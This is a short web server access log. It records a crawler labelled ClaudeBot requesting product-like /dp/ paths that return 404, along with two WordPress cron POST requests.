216.73.217.117 - - [25/Jul/2026:21:03:31 +0200] "GET /dp/375035143414044 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:03:40 +0200] "GET /dp/4ed556981224141 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:03:51 +0200] "GET /dp/c75aba733918881 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:04:00 +0200] "GET /dp/34a974c52214027 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:04:11 +0200] "GET /dp/e02963c03859 HTTP/2" 404 12526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:04:26 +0200] "POST /wp-cron.php?doing_wp_cron=1785006266.0105459690093994140625 HTTP/1.1" 200 474 "-" "dr6S6rL78IB6"
216.73.217.117 - - [25/Jul/2026:21:04:24 +0200] "GET /dp/78aa70152558393 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:21:04:35 +0200] "POST /wp-cron.php?doing_wp_cron=1785006275.8892729282379150390625 HTTP/1.1" 200 474 "-" "XiVdz2Vj9t51"
216.73.217.117 - - [25/Jul/2026:21:04:34 +0200] "GET /dp/81fd1b031771152 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:04:44 +0200] "GET /dp/9cc28b593537089 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:04:54 +0200] "GET /dp/942b81f14717133 HTTP/2" 404 12539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:21:05:04 +0200] "GET /dp/0f1f91385640533 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
